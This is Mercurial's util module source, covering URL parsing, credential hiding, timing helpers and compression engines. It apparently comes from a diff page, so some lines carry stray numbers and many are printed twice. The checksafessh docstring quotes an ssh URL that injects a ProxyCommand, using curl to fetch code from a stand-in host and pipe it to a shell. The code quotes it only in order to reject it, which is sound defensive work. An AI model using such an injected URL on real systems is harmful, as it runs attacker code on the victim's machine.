            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return (url-without-credentials, authinfo-tuple-or-None).

        The second element is suitable for a urllib2 password manager.
        """
        user, passwd = self.user, self.passwd
        try:
            # serialize without credentials, then restore them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        """Report whether this URL cannot be joined onto a base path."""
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        """Return the local filesystem path this URL refers to."""
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
2933
2945
def hasscheme(path):
    """Report whether *path* parses as a URL with an explicit scheme."""
    u = url(path)
    return bool(u.scheme)
2936
2948
def hasdriveletter(path):
    """Report whether *path* starts with a Windows drive letter ('x:')."""
    if not path:
        # preserve the historical behavior of returning the falsy input
        return path
    return path[0:1].isalpha() and path[1:2] == ':'
2939
2951
def urllocalpath(path):
    """Return the local filesystem path for *path*, parsed as a URL.

    Query and fragment markers are left embedded in the path component.
    """
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
2942
2954
def checksafessh(path):
    """Reject a path / url that is a potentially unsafe ssh exploit (SEC).

    ssh parses the first item as an option, e.g.
    ssh://-oProxyCommand=curl${IFS}bad.server|sh/path, so such urls are
    refused entirely and the user is warned.

    Raises error.Abort when the url is unsafe; returns None otherwise.
    """
    path = urlreq.unquote(path)
    if path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
2957
2969
def hidepassword(u):
    """Return url string *u* with any password replaced by '***'."""
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
2964
2976
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes for consistency with hidepassword(); str() here would
    # go through encoding.strmethod and yield text under Python 3 while
    # every other url helper in this module returns a byte string.
    return bytes(u)
2970
2982
# Format a duration (in seconds) for humans: each (digits, divisor, format)
# triple is tried in order by unitcountfn, so the value is rendered in the
# largest unit (s/ms/us/ns) with a sensible number of significant digits.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
2986
2998
# current indentation level for nested @timed reports
_timenesting = [0]

def timed(func):
    '''Decorator reporting a function call's execution time to stderr.

    During development, use it when you need to measure the cost of a
    function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        indent = 2
        begin = timer()
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapper
3013
3025
# suffix -> multiplier table for sizetoint(); checked in this order, so
# single-letter suffixes are tried before their two-letter equivalents
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3035
3047
class hooks(object):
    """A registry of hook callables extending a function's behavior.

    Hooks run in lexicographic order of the source names under which
    they were registered.
    """

    def __init__(self):
        # list of (source, callable) pairs; kept unsorted until call time
        self._hooks = []

    def add(self, source, hook):
        """Register *hook* under the name *source*."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        """Invoke every hook with *args*, returning the list of results."""
        self._hooks.sort(key=lambda pair: pair[0])
        return [hook(*args) for _source, hook in self._hooks]
3053
3065
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
    length of longest filepath+line number,
    filepath+linenumber,
    function

    Not be used in production code but very convenient while developing.
    '''
    # drop the innermost skip+1 frames (this function itself plus the
    # caller-requested skip), then keep only the outermost 'depth' entries;
    # depth=0 keeps everything because [-0:] is the whole list
    entries = [(fileline % (fn, ln), func)
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        # pad the file:line column to the widest entry
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)
3076
3088
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Write *msg* plus a nicely formatted stacktrace to *f* (stderr).

    The 'skip' entries closest to the call are omitted, then 'depth'
    entries are shown. 'otherf' (stdout by default) is flushed first so
    the trace does not interleave with buffered output. Usable anywhere
    and intentionally independent of any ui object; convenient while
    developing but not meant for production code.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
3091
3103
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: skip entries whose state byte
            # equals 'skip'
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        """Record one more use of every ancestor directory of *path*."""
        counts = self._dirs
        for ancestor in finddirs(path):
            if ancestor in counts:
                # a deeper prefix being present means every shallower one
                # is too; record the reference on the deepest existing
                # entry and stop (delpath walks the same way, so the
                # increments and decrements pair up exactly)
                counts[ancestor] += 1
                return
            counts[ancestor] = 1

    def delpath(self, path):
        """Undo one addpath() for *path*."""
        counts = self._dirs
        for ancestor in finddirs(path):
            if counts[ancestor] > 1:
                counts[ancestor] -= 1
                return
            del counts[ancestor]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3127
3139
# Prefer the C implementation of the dirs class when the parsers
# extension module provides one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3130
3142
def finddirs(path):
    """Yield every proper '/'-separated directory prefix of *path*,
    deepest first (e.g. 'a/b/c' yields 'a/b' then 'a')."""
    sep = path.rfind('/')
    while sep != -1:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3136
3148
# compression code

# Roles a peer can play when negotiating wire compression.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes a compression engine's wire protocol support: its wire
# identifier plus its priority when acting as server or client
# (field semantics defined by the consumers of this tuple).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3146 class compressormanager(object):
3158 class compressormanager(object):
3147 """Holds registrations of various compression engines.
3159 """Holds registrations of various compression engines.
3148
3160
3149 This class essentially abstracts the differences between compression
3161 This class essentially abstracts the differences between compression
3150 engines to allow new compression formats to be added easily, possibly from
3162 engines to allow new compression formats to be added easily, possibly from
3151 extensions.
3163 extensions.
3152
3164
3153 Compressors are registered against the global instance by calling its
3165 Compressors are registered against the global instance by calling its
3154 ``register()`` method.
3166 ``register()`` method.
3155 """
3167 """
3156 def __init__(self):
3168 def __init__(self):
3157 self._engines = {}
3169 self._engines = {}
3158 # Bundle spec human name to engine name.
3170 # Bundle spec human name to engine name.
3159 self._bundlenames = {}
3171 self._bundlenames = {}
3160 # Internal bundle identifier to engine name.
3172 # Internal bundle identifier to engine name.
3161 self._bundletypes = {}
3173 self._bundletypes = {}
3162 # Revlog header to engine name.
3174 # Revlog header to engine name.
3163 self._revlogheaders = {}
3175 self._revlogheaders = {}
3164 # Wire proto identifier to engine name.
3176 # Wire proto identifier to engine name.
3165 self._wiretypes = {}
3177 self._wiretypes = {}
3166
3178
3167 def __getitem__(self, key):
3179 def __getitem__(self, key):
3168 return self._engines[key]
3180 return self._engines[key]
3169
3181
3170 def __contains__(self, key):
3182 def __contains__(self, key):
3171 return key in self._engines
3183 return key in self._engines
3172
3184
3173 def __iter__(self):
3185 def __iter__(self):
3174 return iter(self._engines.keys())
3186 return iter(self._engines.keys())
3175
3187
3176 def register(self, engine):
3188 def register(self, engine):
3177 """Register a compression engine with the manager.
3189 """Register a compression engine with the manager.
3178
3190
3179 The argument must be a ``compressionengine`` instance.
3191 The argument must be a ``compressionengine`` instance.
3180 """
3192 """
3181 if not isinstance(engine, compressionengine):
3193 if not isinstance(engine, compressionengine):
3182 raise ValueError(_('argument must be a compressionengine'))
3194 raise ValueError(_('argument must be a compressionengine'))
3183
3195
3184 name = engine.name()
3196 name = engine.name()
3185
3197
3186 if name in self._engines:
3198 if name in self._engines:
3187 raise error.Abort(_('compression engine %s already registered') %
3199 raise error.Abort(_('compression engine %s already registered') %
3188 name)
3200 name)
3189
3201
3190 bundleinfo = engine.bundletype()
3202 bundleinfo = engine.bundletype()
3191 if bundleinfo:
3203 if bundleinfo:
3192 bundlename, bundletype = bundleinfo
3204 bundlename, bundletype = bundleinfo
3193
3205
3194 if bundlename in self._bundlenames:
3206 if bundlename in self._bundlenames:
3195 raise error.Abort(_('bundle name %s already registered') %
3207 raise error.Abort(_('bundle name %s already registered') %
3196 bundlename)
3208 bundlename)
3197 if bundletype in self._bundletypes:
3209 if bundletype in self._bundletypes:
3198 raise error.Abort(_('bundle type %s already registered by %s') %
3210 raise error.Abort(_('bundle type %s already registered by %s') %
3199 (bundletype, self._bundletypes[bundletype]))
3211 (bundletype, self._bundletypes[bundletype]))
3200
3212
3201 # No external facing name declared.
3213 # No external facing name declared.
3202 if bundlename:
3214 if bundlename:
3203 self._bundlenames[bundlename] = name
3215 self._bundlenames[bundlename] = name
3204
3216
3205 self._bundletypes[bundletype] = name
3217 self._bundletypes[bundletype] = name
3206
3218
3207 wiresupport = engine.wireprotosupport()
3219 wiresupport = engine.wireprotosupport()
3208 if wiresupport:
3220 if wiresupport:
3209 wiretype = wiresupport.name
3221 wiretype = wiresupport.name
3210 if wiretype in self._wiretypes:
3222 if wiretype in self._wiretypes:
3211 raise error.Abort(_('wire protocol compression %s already '
3223 raise error.Abort(_('wire protocol compression %s already '
3212 'registered by %s') %
3224 'registered by %s') %
3213 (wiretype, self._wiretypes[wiretype]))
3225 (wiretype, self._wiretypes[wiretype]))
3214
3226
3215 self._wiretypes[wiretype] = name
3227 self._wiretypes[wiretype] = name
3216
3228
3217 revlogheader = engine.revlogheader()
3229 revlogheader = engine.revlogheader()
3218 if revlogheader and revlogheader in self._revlogheaders:
3230 if revlogheader and revlogheader in self._revlogheaders:
3219 raise error.Abort(_('revlog header %s already registered by %s') %
3231 raise error.Abort(_('revlog header %s already registered by %s') %
3220 (revlogheader, self._revlogheaders[revlogheader]))
3232 (revlogheader, self._revlogheaders[revlogheader]))
3221
3233
3222 if revlogheader:
3234 if revlogheader:
3223 self._revlogheaders[revlogheader] = name
3235 self._revlogheaders[revlogheader] = name
3224
3236
3225 self._engines[name] = engine
3237 self._engines[name] = engine
3226
3238
3227 @property
3239 @property
3228 def supportedbundlenames(self):
3240 def supportedbundlenames(self):
3229 return set(self._bundlenames.keys())
3241 return set(self._bundlenames.keys())
3230
3242
3231 @property
3243 @property
3232 def supportedbundletypes(self):
3244 def supportedbundletypes(self):
3233 return set(self._bundletypes.keys())
3245 return set(self._bundletypes.keys())
3234
3246
3235 def forbundlename(self, bundlename):
3247 def forbundlename(self, bundlename):
3236 """Obtain a compression engine registered to a bundle name.
3248 """Obtain a compression engine registered to a bundle name.
3237
3249
3238 Will raise KeyError if the bundle type isn't registered.
3250 Will raise KeyError if the bundle type isn't registered.
3239
3251
3240 Will abort if the engine is known but not available.
3252 Will abort if the engine is known but not available.
3241 """
3253 """
3242 engine = self._engines[self._bundlenames[bundlename]]
3254 engine = self._engines[self._bundlenames[bundlename]]
3243 if not engine.available():
3255 if not engine.available():
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3256 raise error.Abort(_('compression engine %s could not be loaded') %
3245 engine.name())
3257 engine.name())
3246 return engine
3258 return engine
3247
3259
3248 def forbundletype(self, bundletype):
3260 def forbundletype(self, bundletype):
3249 """Obtain a compression engine registered to a bundle type.
3261 """Obtain a compression engine registered to a bundle type.
3250
3262
3251 Will raise KeyError if the bundle type isn't registered.
3263 Will raise KeyError if the bundle type isn't registered.
3252
3264
3253 Will abort if the engine is known but not available.
3265 Will abort if the engine is known but not available.
3254 """
3266 """
3255 engine = self._engines[self._bundletypes[bundletype]]
3267 engine = self._engines[self._bundletypes[bundletype]]
3256 if not engine.available():
3268 if not engine.available():
3257 raise error.Abort(_('compression engine %s could not be loaded') %
3269 raise error.Abort(_('compression engine %s could not be loaded') %
3258 engine.name())
3270 engine.name())
3259 return engine
3271 return engine
3260
3272
3261 def supportedwireengines(self, role, onlyavailable=True):
3273 def supportedwireengines(self, role, onlyavailable=True):
3262 """Obtain compression engines that support the wire protocol.
3274 """Obtain compression engines that support the wire protocol.
3263
3275
3264 Returns a list of engines in prioritized order, most desired first.
3276 Returns a list of engines in prioritized order, most desired first.
3265
3277
3266 If ``onlyavailable`` is set, filter out engines that can't be
3278 If ``onlyavailable`` is set, filter out engines that can't be
3267 loaded.
3279 loaded.
3268 """
3280 """
3269 assert role in (SERVERROLE, CLIENTROLE)
3281 assert role in (SERVERROLE, CLIENTROLE)
3270
3282
3271 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3283 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3272
3284
3273 engines = [self._engines[e] for e in self._wiretypes.values()]
3285 engines = [self._engines[e] for e in self._wiretypes.values()]
3274 if onlyavailable:
3286 if onlyavailable:
3275 engines = [e for e in engines if e.available()]
3287 engines = [e for e in engines if e.available()]
3276
3288
3277 def getkey(e):
3289 def getkey(e):
3278 # Sort first by priority, highest first. In case of tie, sort
3290 # Sort first by priority, highest first. In case of tie, sort
3279 # alphabetically. This is arbitrary, but ensures output is
3291 # alphabetically. This is arbitrary, but ensures output is
3280 # stable.
3292 # stable.
3281 w = e.wireprotosupport()
3293 w = e.wireprotosupport()
3282 return -1 * getattr(w, attr), w.name
3294 return -1 * getattr(w, attr), w.name
3283
3295
3284 return list(sorted(engines, key=getkey))
3296 return list(sorted(engines, key=getkey))
3285
3297
3286 def forwiretype(self, wiretype):
3298 def forwiretype(self, wiretype):
3287 engine = self._engines[self._wiretypes[wiretype]]
3299 engine = self._engines[self._wiretypes[wiretype]]
3288 if not engine.available():
3300 if not engine.available():
3289 raise error.Abort(_('compression engine %s could not be loaded') %
3301 raise error.Abort(_('compression engine %s could not be loaded') %
3290 engine.name())
3302 engine.name())
3291 return engine
3303 return engine
3292
3304
3293 def forrevlogheader(self, header):
3305 def forrevlogheader(self, header):
3294 """Obtain a compression engine registered to a revlog header.
3306 """Obtain a compression engine registered to a revlog header.
3295
3307
3296 Will raise KeyError if the revlog header value isn't registered.
3308 Will raise KeyError if the revlog header value isn't registered.
3297 """
3309 """
3298 return self._engines[self._revlogheaders[header]]
3310 return self._engines[self._revlogheaders[header]]
3299
3311
3300 compengines = compressormanager()
3312 compengines = compressormanager()
3301
3313
3302 class compressionengine(object):
3314 class compressionengine(object):
3303 """Base class for compression engines.
3315 """Base class for compression engines.
3304
3316
3305 Compression engines must implement the interface defined by this class.
3317 Compression engines must implement the interface defined by this class.
3306 """
3318 """
3307 def name(self):
3319 def name(self):
3308 """Returns the name of the compression engine.
3320 """Returns the name of the compression engine.
3309
3321
3310 This is the key the engine is registered under.
3322 This is the key the engine is registered under.
3311
3323
3312 This method must be implemented.
3324 This method must be implemented.
3313 """
3325 """
3314 raise NotImplementedError()
3326 raise NotImplementedError()
3315
3327
3316 def available(self):
3328 def available(self):
3317 """Whether the compression engine is available.
3329 """Whether the compression engine is available.
3318
3330
3319 The intent of this method is to allow optional compression engines
3331 The intent of this method is to allow optional compression engines
3320 that may not be available in all installations (such as engines relying
3332 that may not be available in all installations (such as engines relying
3321 on C extensions that may not be present).
3333 on C extensions that may not be present).
3322 """
3334 """
3323 return True
3335 return True
3324
3336
3325 def bundletype(self):
3337 def bundletype(self):
3326 """Describes bundle identifiers for this engine.
3338 """Describes bundle identifiers for this engine.
3327
3339
3328 If this compression engine isn't supported for bundles, returns None.
3340 If this compression engine isn't supported for bundles, returns None.
3329
3341
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3342 If this engine can be used for bundles, returns a 2-tuple of strings of
3331 the user-facing "bundle spec" compression name and an internal
3343 the user-facing "bundle spec" compression name and an internal
3332 identifier used to denote the compression format within bundles. To
3344 identifier used to denote the compression format within bundles. To
3333 exclude the name from external usage, set the first element to ``None``.
3345 exclude the name from external usage, set the first element to ``None``.
3334
3346
3335 If bundle compression is supported, the class must also implement
3347 If bundle compression is supported, the class must also implement
3336 ``compressstream`` and `decompressorreader``.
3348 ``compressstream`` and `decompressorreader``.
3337
3349
3338 The docstring of this method is used in the help system to tell users
3350 The docstring of this method is used in the help system to tell users
3339 about this engine.
3351 about this engine.
3340 """
3352 """
3341 return None
3353 return None
3342
3354
3343 def wireprotosupport(self):
3355 def wireprotosupport(self):
3344 """Declare support for this compression format on the wire protocol.
3356 """Declare support for this compression format on the wire protocol.
3345
3357
3346 If this compression engine isn't supported for compressing wire
3358 If this compression engine isn't supported for compressing wire
3347 protocol payloads, returns None.
3359 protocol payloads, returns None.
3348
3360
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3361 Otherwise, returns ``compenginewireprotosupport`` with the following
3350 fields:
3362 fields:
3351
3363
3352 * String format identifier
3364 * String format identifier
3353 * Integer priority for the server
3365 * Integer priority for the server
3354 * Integer priority for the client
3366 * Integer priority for the client
3355
3367
3356 The integer priorities are used to order the advertisement of format
3368 The integer priorities are used to order the advertisement of format
3357 support by server and client. The highest integer is advertised
3369 support by server and client. The highest integer is advertised
3358 first. Integers with non-positive values aren't advertised.
3370 first. Integers with non-positive values aren't advertised.
3359
3371
3360 The priority values are somewhat arbitrary and only used for default
3372 The priority values are somewhat arbitrary and only used for default
3361 ordering. The relative order can be changed via config options.
3373 ordering. The relative order can be changed via config options.
3362
3374
3363 If wire protocol compression is supported, the class must also implement
3375 If wire protocol compression is supported, the class must also implement
3364 ``compressstream`` and ``decompressorreader``.
3376 ``compressstream`` and ``decompressorreader``.
3365 """
3377 """
3366 return None
3378 return None
3367
3379
3368 def revlogheader(self):
3380 def revlogheader(self):
3369 """Header added to revlog chunks that identifies this engine.
3381 """Header added to revlog chunks that identifies this engine.
3370
3382
3371 If this engine can be used to compress revlogs, this method should
3383 If this engine can be used to compress revlogs, this method should
3372 return the bytes used to identify chunks compressed with this engine.
3384 return the bytes used to identify chunks compressed with this engine.
3373 Else, the method should return ``None`` to indicate it does not
3385 Else, the method should return ``None`` to indicate it does not
3374 participate in revlog compression.
3386 participate in revlog compression.
3375 """
3387 """
3376 return None
3388 return None
3377
3389
3378 def compressstream(self, it, opts=None):
3390 def compressstream(self, it, opts=None):
3379 """Compress an iterator of chunks.
3391 """Compress an iterator of chunks.
3380
3392
3381 The method receives an iterator (ideally a generator) of chunks of
3393 The method receives an iterator (ideally a generator) of chunks of
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3394 bytes to be compressed. It returns an iterator (ideally a generator)
3383 of bytes of chunks representing the compressed output.
3395 of bytes of chunks representing the compressed output.
3384
3396
3385 Optionally accepts an argument defining how to perform compression.
3397 Optionally accepts an argument defining how to perform compression.
3386 Each engine treats this argument differently.
3398 Each engine treats this argument differently.
3387 """
3399 """
3388 raise NotImplementedError()
3400 raise NotImplementedError()
3389
3401
3390 def decompressorreader(self, fh):
3402 def decompressorreader(self, fh):
3391 """Perform decompression on a file object.
3403 """Perform decompression on a file object.
3392
3404
3393 Argument is an object with a ``read(size)`` method that returns
3405 Argument is an object with a ``read(size)`` method that returns
3394 compressed data. Return value is an object with a ``read(size)`` that
3406 compressed data. Return value is an object with a ``read(size)`` that
3395 returns uncompressed data.
3407 returns uncompressed data.
3396 """
3408 """
3397 raise NotImplementedError()
3409 raise NotImplementedError()
3398
3410
3399 def revlogcompressor(self, opts=None):
3411 def revlogcompressor(self, opts=None):
3400 """Obtain an object that can be used to compress revlog entries.
3412 """Obtain an object that can be used to compress revlog entries.
3401
3413
3402 The object has a ``compress(data)`` method that compresses binary
3414 The object has a ``compress(data)`` method that compresses binary
3403 data. This method returns compressed binary data or ``None`` if
3415 data. This method returns compressed binary data or ``None`` if
3404 the data could not be compressed (too small, not compressible, etc).
3416 the data could not be compressed (too small, not compressible, etc).
3405 The returned data should have a header uniquely identifying this
3417 The returned data should have a header uniquely identifying this
3406 compression format so decompression can be routed to this engine.
3418 compression format so decompression can be routed to this engine.
3407 This header should be identified by the ``revlogheader()`` return
3419 This header should be identified by the ``revlogheader()`` return
3408 value.
3420 value.
3409
3421
3410 The object has a ``decompress(data)`` method that decompresses
3422 The object has a ``decompress(data)`` method that decompresses
3411 data. The method will only be called if ``data`` begins with
3423 data. The method will only be called if ``data`` begins with
3412 ``revlogheader()``. The method should return the raw, uncompressed
3424 ``revlogheader()``. The method should return the raw, uncompressed
3413 data or raise a ``RevlogError``.
3425 data or raise a ``RevlogError``.
3414
3426
3415 The object is reusable but is not thread safe.
3427 The object is reusable but is not thread safe.
3416 """
3428 """
3417 raise NotImplementedError()
3429 raise NotImplementedError()
3418
3430
3419 class _zlibengine(compressionengine):
3431 class _zlibengine(compressionengine):
3420 def name(self):
3432 def name(self):
3421 return 'zlib'
3433 return 'zlib'
3422
3434
3423 def bundletype(self):
3435 def bundletype(self):
3424 """zlib compression using the DEFLATE algorithm.
3436 """zlib compression using the DEFLATE algorithm.
3425
3437
3426 All Mercurial clients should support this format. The compression
3438 All Mercurial clients should support this format. The compression
3427 algorithm strikes a reasonable balance between compression ratio
3439 algorithm strikes a reasonable balance between compression ratio
3428 and size.
3440 and size.
3429 """
3441 """
3430 return 'gzip', 'GZ'
3442 return 'gzip', 'GZ'
3431
3443
3432 def wireprotosupport(self):
3444 def wireprotosupport(self):
3433 return compewireprotosupport('zlib', 20, 20)
3445 return compewireprotosupport('zlib', 20, 20)
3434
3446
3435 def revlogheader(self):
3447 def revlogheader(self):
3436 return 'x'
3448 return 'x'
3437
3449
3438 def compressstream(self, it, opts=None):
3450 def compressstream(self, it, opts=None):
3439 opts = opts or {}
3451 opts = opts or {}
3440
3452
3441 z = zlib.compressobj(opts.get('level', -1))
3453 z = zlib.compressobj(opts.get('level', -1))
3442 for chunk in it:
3454 for chunk in it:
3443 data = z.compress(chunk)
3455 data = z.compress(chunk)
3444 # Not all calls to compress emit data. It is cheaper to inspect
3456 # Not all calls to compress emit data. It is cheaper to inspect
3445 # here than to feed empty chunks through generator.
3457 # here than to feed empty chunks through generator.
3446 if data:
3458 if data:
3447 yield data
3459 yield data
3448
3460
3449 yield z.flush()
3461 yield z.flush()
3450
3462
3451 def decompressorreader(self, fh):
3463 def decompressorreader(self, fh):
3452 def gen():
3464 def gen():
3453 d = zlib.decompressobj()
3465 d = zlib.decompressobj()
3454 for chunk in filechunkiter(fh):
3466 for chunk in filechunkiter(fh):
3455 while chunk:
3467 while chunk:
3456 # Limit output size to limit memory.
3468 # Limit output size to limit memory.
3457 yield d.decompress(chunk, 2 ** 18)
3469 yield d.decompress(chunk, 2 ** 18)
3458 chunk = d.unconsumed_tail
3470 chunk = d.unconsumed_tail
3459
3471
3460 return chunkbuffer(gen())
3472 return chunkbuffer(gen())
3461
3473
3462 class zlibrevlogcompressor(object):
3474 class zlibrevlogcompressor(object):
3463 def compress(self, data):
3475 def compress(self, data):
3464 insize = len(data)
3476 insize = len(data)
3465 # Caller handles empty input case.
3477 # Caller handles empty input case.
3466 assert insize > 0
3478 assert insize > 0
3467
3479
3468 if insize < 44:
3480 if insize < 44:
3469 return None
3481 return None
3470
3482
3471 elif insize <= 1000000:
3483 elif insize <= 1000000:
3472 compressed = zlib.compress(data)
3484 compressed = zlib.compress(data)
3473 if len(compressed) < insize:
3485 if len(compressed) < insize:
3474 return compressed
3486 return compressed
3475 return None
3487 return None
3476
3488
3477 # zlib makes an internal copy of the input buffer, doubling
3489 # zlib makes an internal copy of the input buffer, doubling
3478 # memory usage for large inputs. So do streaming compression
3490 # memory usage for large inputs. So do streaming compression
3479 # on large inputs.
3491 # on large inputs.
3480 else:
3492 else:
3481 z = zlib.compressobj()
3493 z = zlib.compressobj()
3482 parts = []
3494 parts = []
3483 pos = 0
3495 pos = 0
3484 while pos < insize:
3496 while pos < insize:
